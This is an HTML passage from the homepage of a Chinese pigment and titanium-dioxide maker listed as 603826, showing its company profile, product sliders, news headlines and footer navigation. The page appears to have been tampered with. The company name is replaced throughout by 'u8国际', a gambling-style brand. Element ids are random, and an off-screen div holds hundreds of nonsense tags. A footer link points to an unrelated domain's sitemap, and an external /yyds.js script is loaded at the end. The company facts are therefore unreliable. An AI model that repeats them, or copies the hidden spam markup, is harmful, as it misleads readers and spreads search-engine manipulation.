                    <span class="title-en">Group profile</span>
                    <h2 class="title-cn">集团简介</h2>
                </div>
                <p>福建u8国际材料科技股份有限公司（上证：603826）是一家专业从事无机材料研发、生产、销售为一体的全球化企业，主要产品：珠光颜料、钛白粉、氧化铁、功能型二氧化钛、粉体改性等。是全球独家采用萃取法生产的二氧化钛和氧化铁企业，具有全产业链可持续创新的能力，公司使用无人化工艺+工业互联网，应用数字平台为客户提供更快捷的服务，良好的供应链和社会责任管理，为广大新老客户提供更具有价值的合作。</p>
                <ul class="list clearfix">
                    
                    <li class="item">
                        <a href="/gywm/fzlc/"><img src="/uploads/images/icon6.png" class="icon">发展历程</a>
                    </li>
                    
                    <li class="item">
                        <a href="/gywm/qywh/"><img src="/uploads/images/icon7.png" class="icon">使命愿景</a>
                    </li>
                    
                    <li class="item">
                        <a href="/gywm/ryzz/"><img src="/uploads/images/icon8.png" class="icon">荣誉资质</a>
                    </li>
                    
                    <li class="item">
                        <a href="/lxwm/qqyw/"><img src="/uploads/images/icon9.png" class="icon">全球业务</a>
                    </li>
                    
                    
                    
                    <li class="item">
                        <a href="/gywm/">
                            <div id="lq80cy" class="dots">
                                <span class="dot"></span>
                                <span class="dot"></span>
                                <span class="dot"></span>
                            </div>
                        </a>
                    </li>
                    
                </ul>
            </div>
        </div>
    </div>
    <!-- 产品中心 -->
    <div id="4bz6gn" class="index-se3">
        <div id="s5yth2" class="auto1720">
            
            <div id="yty9f9" class="title-view text-center">
                <span class="title-en">Product center</span>
                <h2 class="title-cn">产品中心</h2>
            </div>
            <div id="h6p2ff" class="list clearfix">
                
                <div id="by5fng" class="list-item">
                    <div class="slide" id="slide1">
                        
                        <div id="w8b43t" class="item">
                            <a href="/cpzx/zgxgyl/" style="background-image: url(/static/upload/image/20250905/1757053646712738.jpg);"></a>
                        </div>
                        
                        <div id="j22l77" class="item">
                            <a href="/cpzx/zgxgyl/" style="background-image: url(/static/upload/image/20250905/1757053649334821.jpg);"></a>
                        </div>
                        
                    </div>
                    <a href="javascript:;" class="btn"></a>
                </div>
                
                <div id="b38yr5" class="list-item">
                    <div class="slide" id="slide2">
                        
                        <div id="w3hbj6" class="item">
                            <a href="/cpzx/eyht/" style="background-image: url(/static/upload/image/20250903/1756868236483988.png);"></a>
                        </div>
                        
                        <div id="mw76l4" class="item">
                            <a href="/cpzx/eyht/" style="background-image: url(/static/upload/image/20250903/1756868286662190.png);"></a>
                        </div>
                        
                    </div>
                    <a href="javascript:;" class="btn"></a>
                </div>
                
                <div id="h9r48w" class="list-item">
                    <div class="slide" id="slide3">
                        
                        <div id="thbntr" class="item">
                            <a href="/cpzx/gnddsml/" style="background-image: url(/uploads/uploadfiles/images/pic13_2.jpg);"></a>
                        </div>
                        
                        <div id="5c6w0b" class="item">
                            <a href="/cpzx/gnddsml/" style="background-image: url(/uploads/uploadfiles/images/pic13_2.jpg);"></a>
                        </div>
                        
                    </div>
                    <a href="javascript:;" class="btn"></a>
                </div>
                
                <div id="h0a0b2" class="list-item">
                    <div class="slide" id="slide4">
                        
                        <div id="h1aj90" class="item">
                            <a href="/cpzx/yht/" style="background-image: url(/static/upload/image/20250903/1756868272223784.png);"></a>
                        </div>
                        
                        <div id="tdmz2h" class="item">
                            <a href="/cpzx/yht/" style="background-image: url(/static/upload/image/20250903/1756868275721740.png);"></a>
                        </div>
                        
                    </div>
                    <a href="javascript:;" class="btn"></a>
                </div>
                
            </div>
            
        </div>
    </div>
    <!-- 服务优势 -->
    <div id="y3c5st" class="index-se4">
        <div id="39q8mt" class="auto1720 clearfix">
            
            <div id="qxqq6p" class="content">
                <div id="3p3519" class="title-view">
                    <span class="title-en">Service advantages</span>
                    <h2 class="title-cn">服务优势</h2>
                </div>
                <div id="z4ecx0" class="article">
                    <div id="article">
                        
                        <div id="7thyy3" class="item">
                            <img src="/uploads/images/icon11.png" class="icon">
                            <h3 class="ellipsis">u8国际实力研发</h3>
                            <p class="ellipsis2">u8国际拥有由国家千人计划选拔博士-领军行业人才带领的优秀研发团队，拥有多项商业保密技术，保证产品的高质量和行业前沿产品的创新性。</p>
                        </div>
                        
                        <div id="gbjr26" class="item">
                            <img src="/uploads/images/icon11.png" class="icon">
                            <h3 class="ellipsis">u8国际实力研发</h3>
                            <p class="ellipsis2">u8国际拥有由国家千人计划选拔博士-领军行业人才带领的优秀研发团队，拥有多项商业保密技术，保证产品的高质量和行业前沿产品的创新性。</p>
                        </div>
                        
                    </div>
                    <div class="dots font-arial" id="serviceDots">
                        <span class="current"></span>
                        <small>/</small>
                    </div>
                </div>
                <div class="small-image" id="smallImage">
                    
                    <div id="znyfgg" class="item"><img src="/uploads/uploadfiles/images/img10.jpg"></div>
                    
                    <div id="6dtnbd" class="item"><img src="/uploads/uploadfiles/images/img10.jpg"></div>
                    
                </div>
                <div class="arrows" id="serviceBtn">
                    <span class="prev">&lt;</span>
                    <span class="next">&gt;</span>
                </div>
            </div>
            <div class="image-slide" id="bigImage">
                
                <div id="g5rx2k" class="item"><img src="/uploads/uploadfiles/images/img11.jpg"></div>
                
                <div id="nc93zf" class="item"><img src="/uploads/uploadfiles/images/img11.jpg"></div>
                
            </div>
            
        </div>
    </div>
    <!-- 集团资讯 -->
    <div id="0gtdes" class="index-se5">
        <div id="eww27m" class="auto1720">
            
            <div id="jdxyag" class="title-view text-center">
                <span class="title-en">News center</span>
                <h2 class="title-cn">新闻中心</h2>
            </div>
            <ul class="clearfix" id="newsList">
                
                <li class="item">
                    
                        <div id="xf8lns" class="image">
                            <div id="jgqs7l" class="box" style="background-image: url(/static/upload/image/20251114/1763085229825800.png);"></div>
                        </div>
                        <div id="ddz33l" class="content">
                            <p class="time">2025.11.14</p>
                            <h3 class="title ellipsis">u8国际科技邀您共赴CHINACOAT 2025</h3>
                            <p class="text ellipsis2"></p>
                            <span class="icon"></span>
                        </div>
                    
                </li>
                
                <li class="item">
                    
                        <div id="wm98nl" class="image">
                            <div id="y8w9sa" class="box" style="background-image: url(/static/upload/image/20251114/1763084746130936.jpg);"></div>
                        </div>
                        <div id="b1ll2m" class="content">
                            <p class="time">2025.10.29</p>
                            <h3 class="title ellipsis">新品推荐：u8国际科技激光打码系列产品</h3>
                            <p class="text ellipsis2"></p>
                            <span class="icon"></span>
                        </div>
                    
                </li>
                
                <li class="item">
                    
                        <div id="m43m57" class="image">
                            <div id="z2l7ky" class="box" style="background-image: url(/static/upload/image/20250917/1758090966478544.jpg);"></div>
                        </div>
                        <div id="znbny9" class="content">
                            <p class="time">2025.09.10</p>
                            <h3 class="title ellipsis">u8国际科技亮相厦门98投洽会，前沿科技引投资者瞩目</h3>
                            <p class="text ellipsis2"></p>
                            <span class="icon"></span>
                        </div>
                    
                </li>
                
                <li class="item">
                    
                        <div id="gdsnyk" class="image">
                            <div id="pzbmxg" class="box" style="background-image: url(/static/upload/image/20250908/1757311339979949.jpg);"></div>
                        </div>
                        <div id="pdx9k7" class="content">
                            <p class="time">2025.09.08</p>
                            <h3 class="title ellipsis">秋日焕新｜u8国际科技化妆品级铁系列变色龙珠光颜料</h3>
                            <p class="text ellipsis2"></p>
                            <span class="icon"></span>
                        </div>
                    
                </li>
                
            </ul>
            
        </div>
    </div>
    <div id="93xajh" class="video-overlay">
        <div id="5rqh90" class="close-btn">
            <svg viewBox="0 0 40 40">
                <path d="M10,10 L30,30 M30,10 L10,30"></path>
            </svg>
        </div>
        <div id="t4n9ya" class="inner">
            
            <video src="/static/upload/other/20231101/20231031u8国际企业宣传片.mp4" autoplay controls muted id="video"></video>
            
        </div>
    </div>
    <div id="znpdlh" class="footer">
    <div id="m01jcq" class="auto1720">
        <div id="eny0xn" class="top clearfix">
            <nav class="nav-view clearfix">
                
                <dl class="list">
                    <dt>关于u8国际</dt>
                    
                    
                    <dd><a href="/gywm/qyjj/">企业简介</a></dd>
                    
                    <dd><a href="/gywm/fzlc/">发展历程</a></dd>
                    
                    <dd><a href="/gywm/qywh/">企业文化</a></dd>
                    
                    <dd><a href="/gywm/dsczc/">董事长致辞</a></dd>
                    
                    <dd><a href="/gywm/ryzz/">荣誉资质</a></dd>
                    
                    <dd><a href="/gywm/zzjg/">组织架构</a></dd>
                    
                    <dd>VR全景</dd>
                    
                    
                </dl>
                
                <dl class="list">
                    <dt>研发创新</dt>
                    
                    
                    <dd><a href="/yfcx/yfzx/">研发中心</a></dd>
                    
                    <dd><a href="/yfcx/xjsb/">先进设备</a></dd>
                    
                    <dd><a href="/yfcx/pbzx/">品保中心</a></dd>
                    
                    <dd><a href="/yfcx/zlcg/">专利成果</a></dd>
                    
                    
                </dl>
                
                <dl class="list">
                    <dt>新闻中心</dt>
                    
                    
                    <dd><a href="/xwzx/gsxw/">公司新闻</a></dd>
                    
                    <dd><a href="/xwzx/xydt/">行业动态</a></dd>
                    
                    <dd><a href="/xwzx/zhzx/">展会资讯</a></dd>
                    
                    <dd><a href="/xwzx/cpxw/">新品发布</a></dd>
                    
                    
                </dl>
                
                <dl class="list">
                    <dt>产品中心</dt>
                    
                    
                    <dd><a href="/cpzx/zgxgyl/">珠光效果颜料</a></dd>
                    
                    <dd><a href="/cpzx/gnddsml/">高浓度颜料预分散体</a></dd>
                    
                    <dd><a href="/cpzx/eyht/">钛白粉</a></dd>
                    
                    <dd><a href="/cpzx/yht/">氧化铁</a></dd>
                    
                    <dd><a href="/cpzx/me/">默尔</a></dd>
                    
                    
                </dl>
                
                <dl class="list">
                    <dt>社会责任</dt>
                    
                    
                    <dd><a href="/shzr/qyxwzz/">u8国际的承诺</a></dd>
                    
                    <dd><a href="/shzr/xmcg/">项目成果</a></dd>
                    
                    <dd><a href="/shzr/CSRshbg/">CSR审核报告</a></dd>
                    
                    
                </dl>
                
                <dl class="list">
                    <dt>服务平台</dt>
                    
                    
                    <dd><a href="/wmdfw/sclxqsbg/">色彩流行趋势报告</a></dd>
                    
                    <dd><a href="/wmdfw/dzhcxz/">电子画册下载</a></dd>
                    
                    <dd><a href="/wmdfw/bgxz/">报告下载</a></dd>
                    
                    <dd><a href="/wmdfw/zhengtailink/">正太化学交易平台</a></dd>
                    
                    
                </dl>
                
                <dl class="list">
                    <dt>联系u8国际</dt>
                    
                    
                    <dd><a href="/lxwm/lxfs/">联系方式</a></dd>
                    
                    <dd><a href="/lxwm/qqyw/">全球业务</a></dd>
                    
                    <dd><a href="/lxwm/zxns/">招贤纳士</a></dd>
                    
                    
                </dl>
                
                <dl class="list">
                    <dt>廉政专栏</dt>
                    
                    
                    <dd><a href="/lzzl/lzgy/">廉政公约</a></dd>
                    
                    <dd><a href="/lzzl/sdglhx/">十大管理红线</a></dd>
                    
                    <dd><a href="/lzzl/jbxz/">举报须知</a></dd>
                    
                    <dd><a href="/lzzl/jbglzd/">举报管理制度</a></dd>
                    
                    <dd><a href="/lzzl/lzglzd/">廉政管理制度</a></dd>
                    
                    <dd><a href="/lzzl/pxzj/">培训总结</a></dd>
                    
                    <dd><a href="/lzzl/kzxbg/">可持续报告</a></dd>
                    
                    
                </dl>
                
                <dl class="list">
                    <dt>投资者关系</dt>
                    
                    
                    <dd>公司公告</dd>
                    
                    <dd>互动交流</dd>
                    
                    
                </dl>
                
            </nav>
            <div id="eedg2x" class="right">
                <div id="p06feg" class="shares">
                    <span class="head">u8国际科技实时股价</span>
                    <span class="number" id="p"></span>
                    <span class="data" id="ud"></span>
                    <span class="text">沪港通标u8国际科技 603826.SH</span>
                </div>
                <div id="4sgtrk" class="hot-tel">
                    <p><span class="head">客户服务热线</span></p>
                    <span class="tel">4001-603826</span>
                </div>
            </div>
            <script type="text/javascript" src="https://qt.gtimg.cn/q=sh603826" charset="gb2312"></script>
            <script>
                var elements = v_sh603826.split("~");
                $("#p").text(elements[3]); //当前价
                $("#ud").text(elements[31] + "（" + elements[32] + "%）"); //涨跌
            </script>
        </div>
        <div id="0mwmyk" class="bottom">
            <ul class="links clearfix">
                
                <li>
                    <a href="/fzlm/bqsm/">版权声明</a>
                </li>
                
                <li>
                    <a href="/sitemap/">网站地图</a>
                </li>
                
                <li>
                    <a href="/fzlm/yqlj/">友情链接</a>
                </li>
                
            </ul>
            <p class="copyright">COPYRIGHT ? 福建u8国际材料科技股份有限公司 版权所有 闽ICP备2022010255号-1 公安备案号35018102000672</p>
        </div>
    </div>
</div>
<script type="text/javascript">
    $("#m" + m).addClass("active");
    $("#nav" + nav).addClass("active");
</script>
<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "?c67777bb287c6d6eaa9ac960ea1e0613";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>
    <script type="text/javascript">
        $(function () {
            $('#banner').slick({
                arrows: false,
                dots: true,
				autoplay: true,
				autoplaySpeed: 3000,
            });
            $('#newsList .item').each(function () {
                var imageHeight = $(this).find('.image').outerHeight();
                $(this).find('.content').css('height', imageHeight + 'px');
            });
            $(window).on('resize', function () {
                $('#newsList .item').each(function () {
                    var imageHeight = $(this).find('.image').outerHeight();
                    $(this).find('.content').css('height', imageHeight + 'px');
                });
            });

            $('#slide1').slick({ arrows: false, dots: true });
            $('#slide2').slick({ arrows: false, dots: true });
            $('#slide3').slick({ arrows: false, dots: true });
            $('#slide4').slick({ arrows: false, dots: true });

            $('#article').slick({
                asNavFor: $('#bigImage,#smallImage'),
                prevArrow: $('#serviceBtn .prev'),
                nextArrow: $('#serviceBtn .next'),
                dots: true,
                customPaging: function (slider, current) {
                    var i = fillZero(current);
                    var count = fillZero(slider.slideCount);

                    $('#serviceDots .current').html(i);
                    $('#serviceDots small').html('/' + count);
                }
            });

            $('#article').on('init reInit afterChange', function (event, slick, currentSlide, nextSlide) {
                var i = (currentSlide ? currentSlide : 0) + 1;
                var count = fillZero(slick.slideCount);
                i = fillZero(i);

                $('#serviceDots .current').html(i);
                $('#serviceDots small').html('/' + count);
            });
            $('#bigImage').slick({
                arrows: false,
                asNavFor: $('#smallImage,#article')
            });
            $('#smallImage').slick({
                arrows: false,
                asNavFor: $('#article,#bigImage')
            });

            $('#videoPaly').click(function () {
                $('.video-overlay').fadeIn(function () {
                    $('#video')[0].play();
                });
            });
            $('.video-overlay .close-btn').click(function () {
                $('.video-overlay').fadeOut(function () {
                    $('#video')[0].pause();
                    var videoSrc = $('#video')[0].currentSrc;
                    $('#video')[0].src = '';
                    $('#video')[0].src = videoSrc;
                })
            });
        });

        /* 数字补零 */
        function fillZero(num) {
            if (num < 9) {
                return '0' + num;
            } else {
                return num;
            }
        }
    </script>


<div id='body_jx_93485' style='position:fixed; left:-9000px; top:-9000px;'><ezrse class='zhkbmx'><zi id='zhkbmx'></zi></ezrse><orkll class='bnicah'><ffq id='bnicah'></ffq></orkll><xfj class='kxeobo'><pf id='kxeobo'></pf></xfj><iteus class='cuxmzu'><czzoe id='cuxmzu'></czzoe></iteus><wuul class='bkexiw'><yydzid id='bkexiw'></yydzid></wuul><pprii class='pgzwnb'><japj id='pgzwnb'></japj></pprii><tef class='brlkkj'><zhzz id='brlkkj'></zhzz></tef><rulcx class='wvpnce'><ps id='wvpnce'></ps></rulcx><pa class='uuixax'><jijbp id='uuixax'></jijbp></pa><sk class='dijdby'><udxje id='dijdby'></udxje></sk><dctpf class='fjpqqs'><fjg id='fjpqqs'></fjg></dctpf><ux class='vwepbq'><lqbp id='vwepbq'></lqbp></ux><eadm class='pjwayt'><ggntt id='pjwayt'></ggntt></eadm><buyr class='uesgow'><nijq id='uesgow'></nijq></buyr><jii class='njfsnz'><epqf id='njfsnz'></epqf></jii><yfi class='ivnzgs'><zce id='ivnzgs'></zce></yfi><jdcsx class='dzlkoe'><cjef id='dzlkoe'></cjef></jdcsx><tbbz class='xkzaov'><xuoi id='xkzaov'></xuoi></tbbz><oyuym class='slfppj'><szs id='slfppj'></szs></oyuym><wlngm class='wpmggk'><zdm id='wpmggk'></zdm></wlngm><vppy class='eiqvkj'><mlu id='eiqvkj'></mlu></vppy><zze class='cprgcp'><nfzkvr id='cprgcp'></nfzkvr></zze><aioi class='clxgqy'><dva id='clxgqy'></dva></aioi><qh class='bevvpl'><sr id='bevvpl'></sr></qh><zfmqx class='ymwxwj'><zqbi id='ymwxwj'></zqbi></zfmqx><ebiw class='lpiazv'><xbrj id='lpiazv'></xbrj></ebiw><izxq class='bcwxhs'><rjp id='bcwxhs'></rjp></izxq><duo class='wujoaq'><ds id='wujoaq'></ds></duo><oqen class='yxhtmn'><gkxkuf id='yxhtmn'></gkxkuf></oqen><typrk class='tgqmbn'><ylkd id='tgqmbn'></ylkd></typrk><fkt class='ctltdv'><zo id='ctltdv'></zo></fkt><yjw class='zfbqfc'><euuzi id='zfbqfc'></euuzi></yjw><ju class='ynyicj'><pkbfr id='ynyicj'></pkbfr></ju><rm class='zmdytz'><bnkmp id='zmdytz'></bnkmp></rm><bzeqs class='hgwamv'><brvgjr id='hgwamv'></brvgjr></bzeqs><xd class='lqztzd'><mtklq id='lqztzd'></mtklq></xd><pjrfa class='hejvhm'><ymnf id='hejvhm'></ymnf></pjrfa><nrdg class='jcqnja'><sdtjd id='jcqnja'></sdtjd></nrdg><rmtv class='pasgrv'><bfns id='pasgrv'></bfns></rmtv><urtrl class='ihbzba'><xv id='ihbzba'></xv></urtrl><lrz class='efroab'><yhlip id='efroab'></yhlip></lrz><bzqmo class='bebluy'><xzjhod id='bebluy'></xzjhod></bzqmo><wnr class='gothff'><hhgqfu id='gothff'></hhgqfu></wnr><bxgtu class='ozgzzt'><re id='ozgzzt'></re></bxgtu><hnswh class='yrenjt'><ttdr id='yrenjt'></ttdr></hnswh><sfd class='umzoxi'><prin id='umzoxi'></prin></sfd><hhcl class='fufflb'><oxvb id='fufflb'></oxvb></hhcl><cx class='baydlq'><uh id='baydlq'></uh></cx><toec class='lfypxg'><qehfv id='lfypxg'></qehfv></toec><acgab class='pvqxpc'><kbstk id='pvqxpc'></kbstk></acgab></div>

<div style="text-align:center;"><a href="http://www.great-fortune.net/data/sitemap/www.great-fortune.net.xml">【网站地图】</a><a href="http://www.great-fortune.net/data/sitemap/www.great-fortune.net.xml">【sitemap】</a></div>
<script src="/yyds.js"></script></body>

</html><!--0.00028681755065918-->